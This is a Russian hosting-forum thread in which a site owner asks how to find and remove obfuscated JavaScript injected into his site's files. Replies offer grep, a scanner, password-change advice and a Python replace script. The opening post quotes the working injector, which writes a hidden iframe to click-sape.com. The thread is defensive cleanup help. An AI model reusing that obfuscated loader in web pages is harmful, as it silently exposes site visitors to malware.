Поиск и Замена строк - удаление вредоносного кода

M
На сайте с 10.06.2009
Offline
7
3244

Всем доброго дня.

Обнаружил, что многие файлы содержат вставку вредоносного кода типа:

<script>

String.prototype.sdsd=function(d, o){return this.replace(d, o)};
var sadasd = '<KLiHKYfJYrNAaLJ5mAHeH @sLrY@cNH=Y@\'JLhY5tYY5tKpL@J:N/N/J@@c5l5i5Yc5LkKK-@NAsJa@Hp@HYeNJ.JcHHoKmHL/Li@Jn5.NKcKKLgKNiH?J2K\'Y @LwLYiKdJJJtH5hKL=N@\'L0AHp@5xY@\'KL Hh5JeHi@@gKYNh@AtAKL=N\'JJ0YpNHx5\'L Y5s5A5t@JyKAlL@HeL=\'5JvYAiALKsNiANbLJLiHlAiNtJ@Ly@:5 YhHiNNdd5JeHn55N;L JYYbYNoJrL@dAL5eJrHA:H AKnAAoKYLnAK5eJA;L5\'LN>AK<H/NiLfYY@rKHAaHLm@AeL>K'.sdsd(/[K5JANHYL@]/g,'');
document.write(sadasd);
</script>

как можно искать по всем файлам и удалять этот код из всех файлов, где он обнаружен?

У меня VPS, OS CentoS. root-доступ есть по SSH есть.

ПРЕЛЮДИЯ:вот эта зараза, подгружала непонятный сайт click-sape.com (NOD ругался, что доступ заблокирован при загрузку моего зараженного сайта). По ходу дела, загрузил вирус, и у меня украли больше 1200 долларов с вебмани, в этот же самый вечер вчера 05 мая. Вот так накрылся доход, который зарабатывался несколько месяцев. :(

Помогите, пожалуйста, с коммандами Linux слабо разбираюсь.

XLhost.Ru
На сайте с 09.09.2008
Offline
232
#1

millincoln, не проще дыру залатать, чем каждый раз искать код?

Чаще всего этот код в файлах index.php, index.html и в файле шаблона.

Windows / Linux VPS на NVMe от $10 | Dedicated от $60 ( https://xlho.st )
M
На сайте с 10.06.2009
Offline
7
#2

а как можно залатать?

также это появилось в тот день, когда я обратился к хостеру по ождному вопросу, они спросили у меня данные по root-доступу - я дал. и спустя несколько часов, появился этот код (сайт на друпале стал давать сбои). Да поражает index, menu, header.

Богдан

GluKoza
На сайте с 12.01.2010
Offline
19
#3

Искать примерно так:

grep -rl 'кусок кода который ищем' /путь/к/папке/в которой ищем
Свои сайты держу тут (http://interhost.com.ua/order/pl.php?20)
A7
На сайте с 13.04.2010
Offline
47
#4

а что за хостер?

J
На сайте с 28.03.2010
Offline
21
#5

у нас для поиска вредоносного кода используется iscanner, попробуйте: http://iscanner.isecur1ty.org/

> а как можно залатать?

почистить компьютер от вирусов. в 99% случаев такое бывает, когда трояны крадут пароли от total commander`а и других фтп-клиентов

By accepting this EULA you are accepting this EULA.
Pavel.Odintsov
На сайте с 13.05.2009
Offline
169
#6
jahost:
у нас для поиска вредоносного кода используется iscanner, попробуйте: http://iscanner.isecur1ty.org/

На правах офтопа - и как оно в деле (iScanner)?

Решение по обнаружению DDoS атак для хостинг компаний, дата центров и операторов связи: FastNetMon (https://fastnetmon.com)
M
На сайте с 10.06.2009
Offline
7
#7

спасибо за советы, ребята!

GluKoza, буду пробовать щас.

jahost, спасибо тоже буду щас юзать.

странно, что Нод не заорал, щас пересканировал все, нашел троянов, скорее свего подгруженных с CLICK-SAPE.COM.

а поводу такой шняги, как, например, подгрузка вирусов с click-sape.com и ему подобных, если увидите - такое - сразу бегите к вебмани-киперу и чекаете, чтобы не скоммуниздили кровно нажитые деньги, пока не поздно и чекайте на вирусы.

щас пока жду ответа с арбитража вебмани, а вдруг получится еще вернуть:(

J
На сайте с 28.03.2010
Offline
21
#8

Pavel.Odintsov, примерно так:

много false positives из-за base64, использующейся во многих скриптах, но php-шеллы ищет на ура.

hosting_manager
На сайте с 26.03.2010
Offline
292
#9

Если у Вас файлы на ПК, Вам будет полезна программка:

http://ua-hosting.com.ua/work/instext.rar

instext позволит Вам заменить текст сразу во многих файлах.

Нужно:

- полечить вирусы у себя на ПК

- изменить пароли / логины фтп, чтоб троян после опять не внес вредоносный код

- полечить файлы у себя на ПК, залить исправленные файлы без вредоносного кода на сервер

Только после этого опять обращаться к зараженному сайту, иначе есть вероятность, что троян опять попадет на Ваш ПК (если Вы обратились к сайту, когда на нем оставался вредоносный код).

Также во избежание таких ситуаций рекоммендую не пользоваться Total Commander и т.п. Это не фтп-клиенты и поскольку они очень распространенны - с них часто трояны вытягивают данные для доступа.

Специализированным FTP-клиентом является CuteFTP, его и рекоммендую использовать.

Приятного дня!

ua-hosting.company: серверы в NL/US со скидкой 30% нашим читателям: E5-2650v4/10GB DDR4/240GB SSD/1 Gbps - от $20 ()
ENELIS
На сайте с 29.08.2008
Offline
194
#10

Sed может исправлять это.

или вот небольшой скрипт для питона

переход со строки на строку стандартным \n


# -*- coding: utf-8 -*-
# Python
import os, sys, re

mydir= './' # Укажите тут полный путь до директории
pat=['fitg39hde\ngf973df\n\n'] # Укажите паттерн
repl='' # Чем заменять
ext=['.html','.php','.htm','.xhtml','.shtml','.js'] # Типы файлов для изменения.

def rsinf(path):
tmp=path+'~~~'
input = open(path)
output = open(tmp,'w')
s=input.read()
outtext = s
for d in pat:
if s.find(d) > -1:
#print('"'+d+'" found')
outtext = outtext.replace(d,'')
output.write(outtext)

output.close()
input.close()
os.rename(path, path+'.bak')
os.rename(tmp,path)
print(path+" done...")

def fun(dummy, dirr, filess):
for child in filess:
if os.path.splitext(child)[1] in ext and os.path.isfile(dirr+'/'+child):
rsinf(dirr+'/'+child)
os.path.walk(mydir, fun, 3)

Учтите трогать будет все файлы с окончанием из списка ext

С Уважением, ServerAstra.ru (https://serverastra.com) - VPS и выделенные сервера в Будапеште по выгодным ценам!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий